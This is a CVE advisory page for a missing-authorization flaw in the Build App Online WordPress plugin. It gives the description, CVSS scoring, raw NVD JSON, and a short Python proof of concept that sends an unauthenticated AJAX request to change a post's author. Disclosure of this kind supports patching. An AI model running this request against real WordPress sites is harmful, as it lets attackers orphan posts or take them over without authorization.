Security Vulnerability Report
中文
CVE-2026-3651 CVSS 5.3 MEDIUM

CVE-2026-3651

Published: 2026-03-21 04:17:34
Last Modified: 2026-04-24 16:27:44
Source: [email protected]

Description

The Build App Online plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.23. This is due to the plugin registering the 'build-app-online-update-vendor-product' AJAX action via wp_ajax_nopriv_ without proper authentication checks, capability verification, or nonce validation in the update_vendor_product() function. The function accepts a user-supplied post ID from the request and calls wp_update_post() to modify the post_author field without validating whether the user has permission to modify the specified post. This makes it possible for unauthenticated attackers to modify the post_author of arbitrary posts to 0 (orphaning posts from their legitimate authors), or for authenticated attackers to claim ownership of any post by setting themselves as the author.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Build App Online <= 1.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable WordPress site target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload data # post_id: The ID of the post to be modified # post_author: The ID of the user to set as author (0 to orphan, or specific user ID) payload = { "action": "build-app-online-update-vendor-product", "post_id": "1", "post_author": "0" } try: # Sending POST request without authentication response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:", response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3651", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:34.023", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Build App Online plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.23. This is due to the plugin registering the 'build-app-online-update-vendor-product' AJAX action via wp_ajax_nopriv_ without proper authentication checks, capability verification, or nonce validation in the update_vendor_product() function. The function accepts a user-supplied post ID from the request and calls wp_update_post() to modify the post_author field without validating whether the user has permission to modify the specified post. This makes it possible for unauthenticated attackers to modify the post_author of arbitrary posts to 0 (orphaning posts from their legitimate authors), or for authenticated attackers to claim ownership of any post by setting themselves as the author."}, {"lang": "es", "value": "El plugin Build App Online para WordPress es vulnerable a acceso no autorizado en todas las versiones hasta la 1.0.23, inclusive. Esto se debe a que el plugin registra la acción AJAX 'build-app-online-update-vendor-product' a través de wp_ajax_nopriv_ sin las comprobaciones de autenticación adecuadas, verificación de capacidades o validación de nonce en la función update_vendor_product(). La función acepta un ID de publicación proporcionado por el usuario de la solicitud y llama a wp_update_post() para modificar el campo post_author sin validar si el usuario tiene permiso para modificar la publicación especificada. Esto hace posible que atacantes no autenticados modifiquen el post_author de publicaciones arbitrarias a 0 (dejando las publicaciones huérfanas de sus autores legítimos), o que atacantes autenticados reclamen la propiedad de cualquier publicación al establecerse a sí mismos como el autor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/admin/class-build-app-online-admin.php#L556", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/admin/class-build-app-online-admin.php#L565", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/tags/1.0.23/includes/class-build-app-online.php#L233", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/admin/class-build-app-online-admin.php#L556", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/admin/class-build-app-online-admin.php#L565", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/build-app-online/trunk/includes/class-build-app-online.php#L233", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/51564b26-0d7c-4499-9f5a-84f76c5a5e8a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.